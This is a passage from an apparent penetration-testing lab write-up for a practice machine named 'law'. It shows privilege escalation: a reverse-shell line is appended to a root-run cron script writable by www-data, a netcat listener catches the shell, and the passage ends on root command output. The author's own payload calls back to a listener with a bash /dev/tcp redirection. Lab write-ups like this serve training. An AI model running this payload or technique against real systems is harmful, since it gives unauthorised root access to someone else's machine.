cronjob
PSPY has identified a vulnerable root cronjob process, executing a file, /var/www/cleanup.sh, which the current user, www-data, has the complete control over. Given the root cronjob process is periodically executing the bash script, privilege escalation is possible by leveraging the write privileges to the /var/www/cleanup.sh file
www-data@law:/var/www$ echo '/bin/bash -c "bash -i >& /dev/tcp/192.168.45.203/1234 0>&1"' >> /var/www/cleanup.sh
www-data@law:/var/www$ cat cleanup.sh
#!/bin/bash
rm -rf /var/log/apache2/error.log
rm -rf /var/log/apache2/access.log
/bin/bash -c "bash -i >& /dev/tcp/192.168.45.203/1234 0>&1"Overwriting a reverse shell to the /var/www/cleanup.sh file
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/law]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.203] from (UNKNOWN) [192.168.178.190] 54160
bash: cannot set terminal process group (16779): Inappropriate ioctl for device
bash: no job control in this shell
root@law:~# whoami
whoami
root
root@law:~# hostname
hostname
law
root@law:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:ac:be brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.178.190/24 brd 192.168.178.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:acbe/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise